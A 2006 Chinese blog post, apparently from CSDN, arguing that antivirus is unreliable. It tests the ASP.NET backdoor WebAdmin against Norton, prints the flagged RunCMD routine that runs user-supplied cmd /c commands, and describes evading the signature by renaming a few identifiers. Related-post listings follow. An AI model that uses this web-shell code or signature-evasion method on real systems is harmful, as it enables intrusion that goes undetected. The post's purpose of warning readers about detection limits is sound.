不能过于信赖杀毒软件

原创 2006年05月31日 09:36:00

   本来就已经知道一些木马经过加工是可以逃避杀毒软件的了,不过昨天的测试却让我发现杀毒软件真的非常脆弱。

   测试对象:WebAdmin by lake2
   介绍: WebAdmin是一个运行在ASP.NET环境下的Web后门
         测试环境:WINXP,   Norton 9 企业版,病毒定义包: 2006-05-24

步骤:直接把WebAdmin2X原件放在本地磁盘上,Norton发现并报告“Backdoor:haiyangweng”

把WebAdmin的代码对半拷贝分为两部份,分存为两个文件,结果第一个文件说是病毒,第二个没有报告,再接续把第一部分划分,如此反复,很容易得到被定义为病毒代码的(其实写一个小程序,把直接把它均分为N部分,那查找起来就更快捷了).如下:

Sub RunCMD(Src As Object, E As EventArgs)
 Dim myProcess As New Process()
 Dim myProcessStartInfo As New ProcessStartInfo(cmdPath.Text)
 myProcessStartInfo.UseShellExecute = False
 myProcessStartInfo.RedirectStandardOutput = true
 myProcess.StartInfo = myProcessStartInfo
 myProcessStartInfo.Arguments="/c " & Cmd.text
 myProcess.Start()
 Dim myStreamReader As StreamReader = myProcess.StandardOutput
 Dim myString As String = myStreamReader.Readtoend()
 myProcess.Close()
 mystring=replace(mystring,">","<")
 mystring=replace(mystring,"<","&gt;")
 result.text=Cmd.text & vbcrlf & "<pre>" & mystring & "</pre>"
 Cmd.text=""
End Sub

//就是上面这个过程函数被定义为病毒特征码了

做过最简单的办法,在原件中查找myProcess ,替换为Prcss,再查找myProcessStartInfo替换为PrcssStartInfo,把函数名RunCMD替换为RunC(同样是查找,替换),保存好已经替换后的文件,呵呵,Norton不再提示是病毒了,但是其实这个asp.net的木马功能一点都没有变化,照样是asp.net木马一个!但是回看下,我们修改的仅仅是几个字符而已,而这几个字符就成了Norton的病毒特征码,所以说,杀毒软件不可尽信,用来普通防护还可以,但是如果放心地以为高枕无忧了,那最终吃亏的是自己。

          当然,从程序员的角度来说,判断这种asp木马真的是很头痛的事,因为asp代码中本身就有可能用到这些组件,这些组件用于网络管理那是正确渠道,但用于入侵了就是入侵工具,工具是死的可以判断,但是人的心思电脑就没有办法判断了。

多个杀毒软件共存有什么影响。

各位卡巴斯基软件的用户,大家好!       撰写此文是为了向大家提醒,反病毒软件之间的兼容性方面的若干问题,为什么说一台计算机系统中不能够安装多款反病毒软件,就近是为什么不能够这么做。本文是从纯技...
  • avwjq
  • avwjq
  • 2014年11月07日 19:01
  • 566

Centos7安装杀毒软件ClamAV

原文链接:https://ismailyenigul.wordpress.com/2015/01/05/install-clamav-on-centos-7/ Clam AntiVirus(Cl...
  • heiby
  • heiby
  • 2016年08月06日 14:56
  • 3824

杀毒软件和防火墙的区别

在许多人的思想中,特别是电脑的初学者,都对防火墙有一种错误的认识。即分不清什么是防火墙以及杀毒软件,认为杀毒软件就可以代替防火墙,所以就掉以轻心,成了网络的受害者。其实杀毒软件和防火墙有很大的不同。 ...
  • tennysonsky
  • tennysonsky
  • 2015年03月24日 16:17
  • 3068

利用信赖域算法求解无约束的非线性最小二乘问题~

在上一篇博客中,自己介绍了Levenberg_Marquardt的算法流程,特点以及在非线性最小二乘问题上的应用,信赖域算法也是自己曾经研究过的算法,并且在姿态估计上进行了应用,比较下来,得到的精度和...
  • wsj998689aa
  • wsj998689aa
  • 2014年11月06日 21:59
  • 2188

关于使用WMI获取杀毒软件信息

使用WMI获取杀毒软件信息时需要区分不同的操作系统,不然 会获取不到杀毒软件的信息。以下范例是针对Vista之后版本的: //利用WMI获取杀毒软件信息 #include "stdafx.h" #i...
  • nui111
  • nui111
  • 2015年02月25日 16:48
  • 849

目前看到过的各种杀毒引擎最具技术含量的评论

郑重声明:本贴原作者为走走看看为防止误解,特作如下声明:1.鉴于个人能力有限,文中大量借用了业已在病毒界获得公认的两篇文章:先进杀毒引擎的设计原理 ,流行杀毒软件的引擎设计 。2.为便于理解,文中很多...
  • luo809976897
  • luo809976897
  • 2014年10月14日 14:30
  • 976

现在还有必要安装第三方杀毒软件吗?

(本文全为笔者个人见解) 电脑病毒,伴随着电脑的诞生而来,从电脑出生开始,一直到现在,都是一个安全话题。更何况如今的互联网日益发达,互联网安全更是不容忽视。 但是曾几何时起,各式各样的第三...
  • carlzj
  • carlzj
  • 2016年04月02日 18:28
  • 5886

Linux也有全功能杀毒软件啦!

导读 近日,瑞星公司推出瑞星杀毒软件Linux全功能版,它是一款功能齐全、高性能的企业级安全产品软件,并且新增国内首家“文件监控”与“网络监控”功能,对Linux系统进行系统和网络双层防护,全面保护...
  • snow2know
  • snow2know
  • 2017年01月14日 12:57
  • 4895

五款便携式反病毒和反恶意软件工具 随身随地随时用

杰克·瓦伦列出了他最喜爱的五个便携防病毒/反恶意软件工具,所有这些工具都是便于携带且马到功成的,你有最喜爱的便携反病毒工具吗?将你的建议与大家分享吧。...
  • Purpleendurer
  • Purpleendurer
  • 2015年10月21日 18:25
  • 2161

结构型模式之组合模式(杀毒软件)

类图 代码 package 组合模式实例之杀毒软件; abstract class AbstractFile { //抽象文件类:抽象构件 public abstract void...
  • zenglinshan
  • zenglinshan
  • 2015年11月10日 17:57
  • 1651
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:不能过于信赖杀毒软件
举报原因:
原因补充:

(最多只允许输入30个字)